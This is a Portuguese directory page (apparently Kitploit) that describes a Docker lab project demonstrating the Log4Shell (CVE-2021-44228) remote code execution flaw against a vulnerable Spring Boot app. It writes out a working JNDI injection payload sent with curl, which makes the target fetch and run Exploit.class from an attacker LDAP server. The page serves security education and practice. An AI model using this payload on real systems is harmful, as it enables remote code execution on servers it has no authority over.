Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-44228_Log4Shell — Demonstração de exploração RCE baseada em Docker para Log4Shell (CVE-2021-44228) com aplicação Spring Boot vulnerável, servidor LDAP malicioso e entrega de payload via injeção JNDI. | Kitploit
Ferramentas/GitHubGitHub/vutiendat323/cve-2021-44228_log4shell
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebAprendizado e EducaçãoLabs e Prática
GitHubvutiendat323/cve-2021-44228_log4shell

CVE-2021-44228_Log4Shell

Demonstração de exploração RCE baseada em Docker para Log4Shell (CVE-2021-44228) com aplicação Spring Boot vulnerável, servidor LDAP malicioso e entrega de payload via injeção JNDI.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
5há 4 mesesAinda não revisado
Compartilhar

Demonstração de Exploração da Vulnerabilidade Log4Shell (CVE-2021-44228)

Este projeto simula um cenário de ataque RCE através da vulnerabilidade Log4Shell na biblioteca Apache Log4j 2.

Componentes

  1. vulnerable-app: Aplicação Spring Boot usando Log4j 2.14.1.
  2. attacker: Contém servidor LDAP malicioso (marshalsec) e servidor HTTP que serve o arquivo malicioso Exploit.class.

Como executar

1. Iniciar o ambiente

Requer Docker e Docker Compose instalados.

docker compose up --build

Aguarde até que ambos os contêineres estejam prontos. vulnerable-app estará rodando na porta 8080.

2. Executar o ataque

Abra um novo terminal e envie uma requisição contendo o payload JNDI através do cabeçalho X-Api-Version:

curl -H 'X-Api-Version: ${jndi:ldap://attacker:1389/Exploit}' http://localhost:8080/

3. Verificar o resultado

  • Verifique os logs do contêiner vulnerable-app. Você verá a mensagem do payload registrada.
  • Verifique os logs do contêiner attacker. Você verá a conexão LDAP redirecionada para o servidor HTTP.
  • Confirmação do RCE: Verifique se o arquivo /tmp/pwned foi criado dentro do contêiner vulnerable-app:
docker exec -it vulnerable-app ls -la /tmp/pwned

Se o arquivo existir, significa que o código malicioso Exploit.class foi executado com sucesso!

Aviso

Este projeto é apenas para fins educacionais e de pesquisa em segurança. Não utilize para fins ilegais.

Baixar ferramenta